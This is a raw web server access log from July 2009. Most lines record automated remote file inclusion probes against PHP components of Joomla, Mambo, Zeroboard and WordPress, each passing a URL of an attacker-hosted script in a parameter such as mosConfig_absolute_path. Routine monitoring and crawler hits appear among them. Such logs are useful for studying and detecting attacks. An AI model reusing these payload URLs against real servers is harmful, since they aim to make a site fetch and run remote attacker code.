146.48.83.133 - - [15/Jul/2009:05:18:30 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
146.48.83.133 - - [15/Jul/2009:05:18:30 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
146.48.83.133 - - [15/Jul/2009:05:18:30 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
146.48.83.133 - - [15/Jul/2009:05:18:30 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
209.59.12.99 - - [15/Jul/2009:05:18:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [15/Jul/2009:05:18:45 -0400] "GET /images/items/index2_csblades.jpg HTTP/1.1" 200 3428 "-" "Googlebot-Image/1.0"
92.48.127.79 - - [15/Jul/2009:05:18:56 -0400] "GET /logs/access_log.Q109052500//skin/zero_vote/login.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:19:13 -0400] "GET /logs/access_log.Q109052500//skin/zero_vote/login.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
119.245.138.143 - - [15/Jul/2009:05:19:26 -0400] "GET /logs/access_log.Q109051100/?_zb_path=http://www.warisan.gov.my/ec.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
119.245.138.143 - - [15/Jul/2009:05:19:27 -0400] "GET /?_zb_path=http://www.warisan.gov.my/ec.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
119.245.138.143 - - [15/Jul/2009:05:19:27 -0400] "GET /logs/?_zb_path=http://www.warisan.gov.my/ec.txt?? HTTP/1.1" 200 9592 "-" "libwww-perl/5.79"
62.16.115.69 - - [15/Jul/2009:05:19:35 -0400] "GET /logs/access_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:19:38 -0400] "GET /logs/access_log.Q109052900%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:05:19:39 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
146.48.83.133 - - [15/Jul/2009:05:20:39 -0400] "GET /logs/error_log.Q109060300//skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
146.48.83.133 - - [15/Jul/2009:05:20:52 -0400] "GET /logs/error_log.Q109060300//skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
146.48.83.133 - - [15/Jul/2009:05:20:53 -0400] "GET /logs/error_log.Q109060300//skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
146.48.83.133 - - [15/Jul/2009:05:20:57 -0400] "GET /logs/error_log.Q109060300//skin/zero_vote/ask_password.php?dir=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/img/v6id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
114.200.199.144 - - [15/Jul/2009:05:21:06 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:21:07 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:21:07 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.61.244.6 - - [15/Jul/2009:05:21:20 -0400] "GET /logs/administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path=http://www.a-s-f.at/dreck/test.txt?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
209.61.244.6 - - [15/Jul/2009:05:21:20 -0400] "GET /administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path=http://www.a-s-f.at/dreck/test.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
114.200.199.144 - - [15/Jul/2009:05:21:43 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:21:43 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:21:43 -0400] "GET /logs/access_log.Q109052300%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:21:43 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:22:01 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.192 - - [15/Jul/2009:05:22:13 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.192 - - [15/Jul/2009:05:22:13 -0400] "GET /logs/access_log.Q109060100//skin/zero_vote/ask_password.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.192 - - [15/Jul/2009:05:22:13 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [15/Jul/2009:05:22:13 -0400] "GET /logs/access_log.Q109060500//skin/zero_vote/ask_password.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.120.237.150 - - [15/Jul/2009:05:22:34 -0400] "GET /logs/access_log.Q109053100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jul/2009:05:22:34 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jul/2009:05:22:34 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 9597 "-" "libwww-perl/5.811"
82.194.87.219 - - [15/Jul/2009:05:23:03 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://webmaster-100.com/images/id? HTTP/1.1" 404 236 "-" "libwww-perl/5.822"
209.59.12.99 - - [15/Jul/2009:05:23:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.120.237.150 - - [15/Jul/2009:05:25:31 -0400] "GET /logs/access_log.Q109070800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
87.106.245.84 - - [15/Jul/2009:05:26:00 -0400] "GET /popup.php?path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.106.245.84 - - [15/Jul/2009:05:26:00 -0400] "GET /logs/popup.php?path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.106.245.84 - - [15/Jul/2009:05:26:01 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:21 -0400] "GET //skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:21 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:21 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:27 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:35 -0400] "GET //skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:35 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:26:35 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.245.84 - - [15/Jul/2009:05:26:35 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.169.210.130 - - [15/Jul/2009:05:26:36 -0400] "GET /logs/access_log.Q109053000/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
217.169.210.130 - - [15/Jul/2009:05:26:36 -0400] "GET /index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
217.169.210.130 - - [15/Jul/2009:05:26:36 -0400] "GET /logs/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
92.48.127.79 - - [15/Jul/2009:05:26:38 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.111.62.19 - - [15/Jul/2009:05:27:09 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
217.169.210.130 - - [15/Jul/2009:05:27:38 -0400] "GET /logs/access_log.Q109051700/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
62.16.115.69 - - [15/Jul/2009:05:27:39 -0400] "GET /popup.php?path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:05:27:39 -0400] "GET /logs/popup.php?path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:05:27:39 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:05:28:06 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.79.47.122 - - [15/Jul/2009:05:28:24 -0400] "GET /logs/access_log.Q109051300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.79.47.122 - - [15/Jul/2009:05:28:24 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
220.79.47.122 - - [15/Jul/2009:05:28:27 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jul/2009:05:28:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.194.87.219 - - [15/Jul/2009:05:28:44 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://webmaster-100.com/images/id? HTTP/1.1" 404 236 "-" "libwww-perl/5.822"
220.79.47.122 - - [15/Jul/2009:05:28:50 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.236.47.192 - - [15/Jul/2009:05:28:53 -0400] "GET /logs/access_log.Q109060100%20%20//skin/zero_vote/ask_password.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.236.47.192 - - [15/Jul/2009:05:29:12 -0400] "GET /logs/access_log.Q109060500%20%20//skin/zero_vote/ask_password.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:29:25 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:29:25 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:29:26 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
62.128.135.52 - - [15/Jul/2009:05:29:40 -0400] "GET /logs/access_log.Q109053100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jul/2009:05:29:40 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jul/2009:05:29:40 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 9597 "-" "libwww-perl/5.805"
114.200.199.144 - - [15/Jul/2009:05:29:48 -0400] "GET /logs/access_log.Q109061300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
220.231.126.252 - - [15/Jul/2009:05:30:32 -0400] "GET /logs/access_log.Q109070400%20%20//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
82.194.87.219 - - [15/Jul/2009:05:30:34 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://webmaster-100.com/images/id? HTTP/1.1" 404 236 "-" "libwww-perl/5.822"
79.148.238.69 - - [15/Jul/2009:05:30:34 -0400] "GET /logs/access_log.Q109053000/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
79.148.238.69 - - [15/Jul/2009:05:30:35 -0400] "GET /index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
79.148.238.69 - - [15/Jul/2009:05:30:35 -0400] "GET /logs/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
79.148.238.69 - - [15/Jul/2009:05:32:00 -0400] "GET /logs/access_log.Q109051700/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
114.200.199.144 - - [15/Jul/2009:05:33:19 -0400] "GET /logs/access_log.Q109052300/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.68.247 - - [15/Jul/2009:05:33:31 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.68.247 - - [15/Jul/2009:05:33:31 -0400] "GET /images/over-index15_solut.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
72.30.161.230 - - [15/Jul/2009:05:33:01 -0400] "GET /logs/access_log.Q109061100 HTTP/1.0" 200 4824283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [15/Jul/2009:05:33:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [15/Jul/2009:05:34:03 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:34:12 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:05:34:24 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.111.62.19 - - [15/Jul/2009:05:35:06 -0400] "GET /logs/access_log.Q109053100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
200.111.62.19 - - [15/Jul/2009:05:35:06 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
200.111.62.19 - - [15/Jul/2009:05:35:06 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 9597 "-" "libwww-perl/5.805"
92.48.127.79 - - [15/Jul/2009:05:35:57 -0400] "GET //skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:35:57 -0400] "GET /logs//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:35:57 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:35:57 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
174.37.32.229 - - [15/Jul/2009:05:36:15 -0400] "GET /logs/ HTTP/1.1" 200 9592 "-" "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)"
92.48.127.79 - - [15/Jul/2009:05:37:20 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:37:20 -0400] "GET /logs//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:37:20 -0400] "GET //skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:37:24 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.205.57.2 - - [15/Jul/2009:05:37:50 -0400] "GET /logs/access_log.Q109070600//?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
210.205.57.2 - - [15/Jul/2009:05:37:51 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
210.205.57.2 - - [15/Jul/2009:05:37:51 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 200 9597 "-" "libwww-perl/5.79"
202.125.45.45 - - [15/Jul/2009:05:38:17 -0400] "GET /logs/access_log.Q109070800/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:38:17 -0400] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:38:17 -0400] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:38:26 -0400] "GET /logs/access_log.Q109062200/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
92.48.127.79 - - [15/Jul/2009:05:38:38 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:38:42 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jul/2009:05:38:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.111.62.19 - - [15/Jul/2009:05:39:00 -0400] "GET /logs/access_log.Q109070800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
76.12.17.218 - - [15/Jul/2009:05:39:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:39:30 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:39:30 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
65.55.105.236 - - [15/Jul/2009:05:39:30 -0400] "GET /logs/access_log.Q107091000 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
201.232.54.48 - - [15/Jul/2009:05:39:35 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:39:35 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:39:35 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:39:39 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:39:44 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:39:44 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:39:53 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.48.127.79 - - [15/Jul/2009:05:39:53 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/write.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:39:54 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:40:03 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:40:03 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:40:13 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
